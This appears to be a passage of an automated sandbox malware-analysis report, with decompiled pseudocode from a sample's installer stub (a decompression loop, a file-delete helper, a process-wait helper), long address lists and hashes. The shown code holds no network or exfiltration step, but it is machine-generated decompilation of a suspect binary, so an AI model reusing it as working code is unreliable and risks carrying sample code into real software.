													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                            0x00000000
                            0x00407068
                            0x00407068
                            0x0040706c
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x00407077
                            0x00407084
                            0x00407087
                            0x004073cb
                            0x004073cb
                            0x004073ce
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x004075e5
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00407601
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00407447
                            0x00407447
                            0x00406be3
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00000000
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x004073cb
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00406dc8
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00407447
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040744d
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004073ce
                            0x004073cb

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 41%
                            			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                            0x00405d2d
                            0x00405d38
                            0x00405d3d
                            0x00405d6d
                            0x00000000
                            0x00405d6d
                            0x00405d44
                            0x00405d45
                            0x00405d4f
                            0x00405d47
                            0x00405d47
                            0x00405d47
                            0x00405d57
                            0x00405d63
                            0x00405d67
                            0x00405d67
                            0x00000000
                            0x00405d59
                            0x00000000
                            0x00405d5b

                            APIs
                              • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                              • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$Attributes$DeleteDirectoryRemove
                            • String ID:
                            • API String ID: 1655745494-0
                            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                            • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                            • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                            0x00406af1
                            0x00406b08
                            0x00406afc
                            0x00406b06
                            0x00406b06
                            0x00406b13
                            0x00406b1f

                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                            • GetExitCodeProcess.KERNELBASE ref: 00406B13
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
